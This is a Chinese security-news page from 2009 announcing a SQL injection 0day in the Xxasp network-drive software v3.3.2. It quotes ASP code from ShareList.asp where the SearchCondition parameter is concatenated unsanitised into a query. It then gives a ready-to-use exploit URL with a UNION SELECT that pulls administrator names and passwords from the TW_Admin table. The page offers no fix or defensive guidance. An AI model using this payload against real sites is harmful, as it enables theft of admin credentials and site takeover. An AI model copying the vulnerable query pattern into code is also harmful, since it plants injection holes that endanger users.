Xxasp网络硬盘v3.3.2 Sql injection 0daypc软件 文章资讯 手机软件

您当前的位置→图文中心新闻资讯安全播报Xxasp网络硬盘v3.3.2 Sql injection 0day

Xxasp网络硬盘v3.3.2 Sql injection 0day


2009/12/7  编辑:admin 来源:本站整理  关键词:

Xxasp网络硬盘v3.3.2 Sql injection 0day

 

至于这套系统system我就不多介绍说明了,漏洞涉及文件程序为MyFiles.asp ShareList.asp,
我以ShareList.asp为例不复杂分析下,代码如下:
Dim MyOrderBy,MyCondition,MyTopField,SearchType,SearchCondition
SearchType=Trim(Request("SearchType"))
SearchCondition=Trim(Request("SearchCondition"))     //注入点
If SearchType="" Then SearchType="BaseSearch"
If SearchCondition="" Then SearchCondition="1"
MyTopField=""
Select Case SearchType
Case "BaseSearch"
Select Case SearchCondition
Case "2"
MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('h',A.F_AddTime,"&SqlNowString&")<25"
Case "3"
MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('d',F_AddTime,"&SqlNowString&")<3"
Case "4"
MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('d',A.F_AddTime,"&SqlNowString&")<7"
Case "5"
MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('d',A.F_AddTime,"&SqlNowString&")<21"
Case "6"
MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('m',A.F_AddTime,"&SqlNowString&")<1"
Case "7"
MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('m',A.F_AddTime,"&SqlNowString&")<3"
Case "8"
MyTopField="Top 100 ":MyOrderBy="A.F_DownloadTimes Desc":MyCondition=""
Case "9"
If ClsPub.TW_Config(42)<=1 Then
MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('h',A.F_AddTime,"&SqlNowString&")<25"
Else
MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('d',A.F_AddTime,"&SqlNowString&")<"&ClsPub.TW_Config(42)
End If
Case "10"
If ClsPub.TW_Config(42)<=1 Then
MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('h',A.F_AddTime,"&SqlNowString&")>25"
Else
MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('d',A.F_AddTime,"&SqlNowString&")>"&ClsPub.TW_Config(42)
End If
Case Else
MyOrderBy="A.F_AddTime Desc":MyCondition=""
End Select
Case "SearchFileType"
If SearchCondition<>"1" Then
MyOrderBy="A.F_AddTime Desc":MyCondition="A.F_Ext='"&Lcase(SearchCondition)&"'" //如果SearchCondition不为1,带入sql查询
Else
MyOrderBy="A.F_AddTime Desc":MyCondition=""
End If
exp:注册登陆后,http://www.xxx.com/disk/ShareList.asp?Action=Main&SearchType=SearchFileType&SearchCondition=rar' and 1=2 union select
1,2,3,4,5,6,7,8,9,10,11,AdminName,AdminPwd,14,15,16,17 from TW_Admin where '1'='1
 

相关文章
  • IPhone7防水等级多少?IPXX代表什么意思
  • xp系统弹出“xx内存不能为read或written”提示怎么办
  • 曾和女外星人XX的英国议员又爆料!
  • qq你偷偷在XX脸上写四个字会写啥奖励QQ黄钻
  • Xxasp网络硬盘v3.3.2 Sql injection 0day
  • 入侵XX地区北大青鸟所有机器
  • 解决开机无法加载XX.dll的问题的方法总结
  • 发表评论
    阅读排行
    相关热门
    网站帮助 - 广告合作 - 下载声明 - 网站地图